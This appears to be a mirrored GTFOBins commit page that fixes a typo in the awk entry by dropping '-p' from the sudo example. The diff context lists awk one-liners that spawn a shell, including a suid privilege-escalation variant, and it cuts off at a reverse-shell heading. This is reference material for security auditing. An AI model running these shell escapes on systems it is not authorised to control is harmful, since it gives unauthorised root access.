mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-08-23 09:34:56 +02:00
Remove the -p option from sudo-enabled (typo)
This commit is contained in:
@@ -3,7 +3,7 @@ functions:
|
|||||||
exec-interactive:
|
exec-interactive:
|
||||||
- code: awk 'BEGIN {system("/bin/sh")}'
|
- code: awk 'BEGIN {system("/bin/sh")}'
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo awk 'BEGIN {system("/bin/sh -p")}'
|
- code: sudo awk 'BEGIN {system("/bin/sh")}'
|
||||||
suid-limited:
|
suid-limited:
|
||||||
- code: ./awk 'BEGIN {system("/bin/sh -p")}'
|
- code: ./awk 'BEGIN {system("/bin/sh -p")}'
|
||||||
reverse-shell-non-interactive:
|
reverse-shell-non-interactive:
|
||||||
|
Reference in New Issue
Block a user